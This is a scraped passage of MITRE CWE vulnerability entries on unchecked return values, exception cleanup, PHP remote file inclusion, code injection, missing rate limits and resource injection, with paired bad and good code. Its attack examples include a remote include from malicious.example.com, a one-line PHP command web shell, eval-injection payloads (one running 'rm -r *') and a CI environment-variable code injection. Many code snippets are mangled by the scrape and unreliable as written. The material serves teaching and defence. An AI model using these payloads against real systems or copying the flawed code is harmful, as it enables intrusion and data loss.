String pFileName = PFILE_ROOT + "/" + userName; FileInputStream fis = new FileInputStream(pFileName); fis.read(byteArray); // the file is always 1k bytes fis.close(); processPFile(userName, byteArray); The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker. Example 4 The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference. (bad code)
Example Language: Java
String itemName = request.getParameter(ITEM_NAME);
if (itemName.compareTo(IMPORTANT_ITEM) == 0) { ... }... The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference. (bad code)
Example Language: Java
String itemName = request.Item(ITEM_NAME);
if (itemName.Equals(IMPORTANT_ITEM)) { ... }... The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. Example 5 The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined. (bad code)
Example Language: Java
System.clearProperty("os.name");
... String os = System.getProperty("os.name"); if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported"); The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. Example 6 The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value. (bad code)
Example Language: C#
Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)
Dim MyArray(50) As Byte MyFile.Read(MyArray, 0, 50) DoDangerousOperation(MyArray(20)) In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. Example 7 This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. (bad code)
Example Language: C
void host_lookup(char *user_supplied_addr){
struct hostent *hp;
in_addr_t *addr; char hostname[64]; in_addr_t inet_addr(const char *cp); /*routine that ensures user_supplied_addr is in the right format for conversion */ validate_addr_form(user_supplied_addr); addr = inet_addr(user_supplied_addr); hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET); strcpy(hostname, hp->h_name); If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy(). Note that this code is also vulnerable to a buffer overflow (CWE-119). Example 8 In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively. (bad code)
Example Language: C++
int outputStringToFile(char *output, char *filename) {
openFileToWrite(filename); writeToFile(output); closeFile(filename); However, this code does not check the return values of the methods openFileToWrite, writeToFile, closeFile to verify that the file was properly opened and closed and that the string was successfully written to the file. The return values for these methods should be checked to determine if the method was successful and allow for detection of errors or unexpected conditions as in the following example. (good code)
Example Language: C++
int outputStringToFile(char *output, char *filename) {
int isOutput = SUCCESS;
int isOpen = openFileToWrite(filename); if (isOpen == FAIL) { printf("Unable to open file %s", filename); }isOutput = FAIL; else { int isWrite = writeToFile(output);
if (isWrite == FAIL) { printf("Unable to write to file %s", filename); }isOutput = FAIL; int isClose = closeFile(filename); if (isClose == FAIL) isOutput = FAIL;
return isOutput; Example 9 In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, the readFile object is initialized using the setInputFile method. The setInputFile method should be called before calling the readFromFile method. (bad code)
Example Language: Java
private File readFile = null;
public void setInputFile(String inputFile) { // create readFile File object from string containing name of file public void readFromFile() { try {
reader = new FileReader(readFile);
// read input file However, the readFromFile method does not check to see if the readFile object is null, i.e. has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null and output an error message and raise an exception if the readFile object is null, as in the following code. (good code)
Example Language: Java
private File readFile = null;
public void setInputFile(String inputFile) { // create readFile File object from string containing name of file public void readFromFile() { try {
if (readFile == null) {
System.err.println("Input file has not been set, call setInputFile method before calling openInputFile"); }throw NullPointerException; reader = new FileReader(readFile); // read input file catch (NullPointerException ex) {...} Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value.
CWE-703: Improper Check or Handling of Exceptional Conditions
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Consider the following code segment: (bad code)
Example Language: C
char buf[10], cp_buf[10];
fgets(buf, 10, stdin); strcpy(cp_buf, buf); The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy(). Example 2 The following method throws three types of exceptions. (good code)
Example Language: Java
public void doExchange() throws IOException, InvocationTargetException, SQLException {
... }While it might seem tidier to write (bad code)
Example Language: Java
public void doExchange() throws Exception {
... }doing so hampers the caller's ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This is a high-level class that might have some overlap with other classes. It could be argued that even "normal" weaknesses such as buffer overflows involve unusual or exceptional conditions. In that sense, this might be an inherent aspect of most other weaknesses within CWE, similar to API Abuse (CWE-227) and Indicator of Poor Code Quality (CWE-398). However, this entry is currently intended to unify disparate concepts that do not have other places within the Research Concepts view (CWE-1000).
CWE-460: Improper Cleanup on Thrown Exception
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.
Often, when functions or loops become complicated, some level of resource cleanup is needed throughout execution. Exceptions can disturb the flow of the code and prevent the necessary cleanup from happening.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example demonstrates the weakness. (bad code)
Example Language: Java
public class foo {
public static final void main( String args[] ) {
boolean returnValue; returnValue=doStuff(); public static final boolean doStuff( ) { boolean threadLock; boolean truthvalue=true; try { while( //check some condition ) { threadLock=true; //do some stuff to truthvalue threadLock=false; catch (Exception e){ System.err.println("You did something bad"); if (something) return truthvalue; return truthvalue; In this case, a thread might be left locked accidentally.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it. (bad code)
Example Language: PHP
$dir = $_GET['module_name'];
include($dir . "/function.php"); The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the 'module_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a 'module_name' of "http://malicious.example.com" by using the following request string: (attack code)
victim.php?module_name=http://malicious.example.com
Upon receiving this request, the code would set 'module_name' to the value "http://malicious.example.com" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains. For the sake of this example, assume that the malicious version of function.php looks like the following: (bad code)
Example Language: PHP
system($_GET['cmd']);
An attacker could now go a step further in our example and provide a request string as follows: (attack code)
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l
The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the 'cmd' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case: (attack code)
/bin/ls -l
Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role. Can overlap directory traversal in local inclusion problems.
CWE-94: Improper Control of Generation of Code ('Code Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example attempts to write user messages to a message file and allow users to view them. (bad code)
Example Language: PHP
$MessageFile = "messages.out";
if ($_GET["action"] == "NewMessage") { $name = $_GET["name"]; }$message = $_GET["message"]; $handle = fopen($MessageFile, "a+"); fwrite($handle, "<b>$name</b> says '$message'<hr>\n"); fclose($handle); echo "Message Saved!<p>\n"; else if ($_GET["action"] == "ViewMessages") { include($MessageFile); }While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as: (attack code)
name=h4x0r
message=%3C?php%20system(%22/bin/ls%20-l%22);?%3E which will decode to the following: (attack code)
<?php system("/bin/ls -l");?>
The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages. Notice that XSS (CWE-79) is also possible in this situation. Example 2 edit-config.pl: This CGI script is used to modify settings in a configuration file. (bad code)
Example Language: Perl
use CGI qw(:standard);
sub config_file_add_key { my ($fname, $key, $arg) = @_;
# code to add a field/key to a file goes here sub config_file_set_key { my ($fname, $key, $arg) = @_;
# code to set key to a particular file goes here sub config_file_delete_key { my ($fname, $key, $arg) = @_;
# code to delete key from a particular file goes here sub handleConfigAction { my ($fname, $action) = @_;
my $key = param('key'); my $val = param('val'); # this is super-efficient code, especially if you have to invoke # any one of dozens of different functions! my $code = "config_file_$action_key(\$fname, \$key, \$val);"; eval($code); $configfile = "/home/cwe/config.txt"; print header; if (defined(param('action'))) { handleConfigAction($configfile, param('action')); }else { print "No action specified!\n"; }The script intends to take the 'action' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as: (attack code)
add_key(",","); system("/bin/ls");
This would produce the following string in handleConfigAction(): (result)
config_file_add_key(",","); system("/bin/ls");
Any arbitrary Perl code could be added after the attacker has "closed off" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker's payload is activated. This particular manipulation would fail after the system() call, because the "_key(\$fname, \$key, \$val)" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated. Example 3 This simple python3 script asks a user to supply a comma-separated list of numbers as input and adds them together. (bad code)
Example Language: Python
def main():
sum = 0
main()
try:
numbers = eval(input("Enter a comma-separated list of numbers: "))
except SyntaxError:
print("Error: invalid input")
for num in numbers:return
sum = sum + num
print(f"Sum of {numbers} = {sum}")
The eval() function can take the user-supplied list and convert it into a Python list object, therefore allowing the programmer to use list comprehension methods to work with the data. However, if code is supplied to the eval() function, it will execute that code. For example, a malicious user could supply the following string: (attack code)
__import__('subprocess').getoutput('rm -r *')
This would delete all the files in the current directory. For this reason, it is not recommended to use eval() with untrusted input. A way to accomplish this without the use of eval() is to apply an integer conversion on the input within a try/except block. If the user-supplied input is not numeric, this will raise a ValueError. By avoiding eval(), there is no opportunity for the input string to be executed as code. (good code)
Example Language: Python
def main():
sum = 0
main()
numbers = input("Enter a comma-separated list of numbers: ").split(",") try:
for num in numbers:
except ValueError:
sum = sum + int(num)
print(f"Sum of {numbers} = {sum}")
print("Error: invalid input")
An alternative, commonly-cited mitigation for this kind of weakness is to use the ast.literal_eval() function, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373]. Example 4 The following code is a workflow job written using YAML. The code attempts to download pull request artifacts, unzip from the artifact called pr.zip and extract the value of the file NR into a variable "pr_number" that will be used later in another job. It attempts to create a github workflow environment variable, writing to $GITHUB_ENV. The environment variable value is retrieved from an external resource. (bad code)
Example Language: Other
name: Deploy Preview
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: 'Download artifact'
uses: actions/github-script with:
script: |
- run: |
var artifacts = await github.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
});repo: context.repo.repo, run_id: ${{ github.event.workflow_run.id }}, var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => {
return artifact.name == "pr"
})[0];var downloadPr = await github.actions.downloadArtifact({
owner: context.repo.owner,
});repo: context.repo.repo, artifact_id: matchPrArtifact.id, archive_format: 'zip', var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data));
unzip pr.zip
echo "pr_number=$(cat NR)" >> $GITHUB_ENV
The code does not neutralize the value of the file NR, e.g. by validating that NR only contains a number (CWE-1284). The NR file is attacker controlled because it originates from a pull request that produced pr.zip. The attacker could escape the existing pr_number and create a new variable using a "\n" (CWE-93) followed by any environment variable to be added such as: (attack code)
\nNODE_OPTIONS="--experimental-modules --experiments-loader=data:text/javascript,console.log('injected code');//"
This would result in injecting and running javascript code (CWE-94) on the workflow runner with elevated privileges. (good code)
Example Language: Other
The code could be modified to validate that the NR
file only contains a numeric value, or the code could
retrieve the PR number from a more trusted source.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Theoretical Injection problems encompass a wide variety of issues -- all mitigated in very different ways. For this reason, the most effective way to discuss these weaknesses is to note the distinct features that classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities.
CWE-799: Improper Control of Interaction Frequency
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.
This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following code a username and password is read from a socket and an attempt is made to authenticate the username and password. The code will continuously checked the socket for a username and password until it has been authenticated. (bad code)
Example Language: C
char username[USERNAME_SIZE];
char password[PASSWORD_SIZE]; while (isValidUser == 0) { if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) { }isValidUser = AuthenticateUser(username, password); }return(SUCCESS); This code does not place any restriction on the number of authentication attempts made. There should be a limit on the number of authentication attempts made to prevent brute force attacks as in the following example code. (good code)
Example Language: C
int count = 0;
while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) { if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) { }isValidUser = AuthenticateUser(username, password); }count++; if (isValidUser) { return(SUCCESS); }else { return(FAIL); }Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-99: Improper Control of Resource Identifiers ('Resource Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.
A resource injection issue occurs when the following two conditions are met:
This may enable an attacker to access or modify otherwise protected system resources.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files. (bad code)
Example Language: Java
String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName); ... rFile.delete(); Example 2 The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system. (bad code)
Example Language: C++
ifstream ifs(argv[0]);
string s; ifs >> s; cout << s; The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name "path manipulation.") Similarly, data that contains URLs and URIs is risky for functions that create remote connections. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73).
Maintenance
The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.
CWE-116: Improper Encoding or Escaping of Output
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.
Improper encoding or escaping can allow attackers to change the commands that are sent to another component, inserting malicious commands instead. Most products follow a certain protocol that uses structured messages for communication between components, such as queries or commands. These structured messages can contain raw data interspersed with metadata or control information. For example, "GET /index.html HTTP/1.1" is a structured message containing a command ("GET") with a single argument ("/index.html") and metadata about which protocol version is being used ("HTTP/1.1"). If an application uses attacker-supplied inputs to construct a structured message without properly encoding or escaping, then the attacker could insert special characters that will cause the data to be interpreted as control information or metadata. Consequently, the component that receives the output will perform the wrong operations, or otherwise interpret the data incorrectly. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code displays an email address that was submitted as part of a form. (bad code)
Example Language: JSP
<% String email = request.getParameter("email"); %>
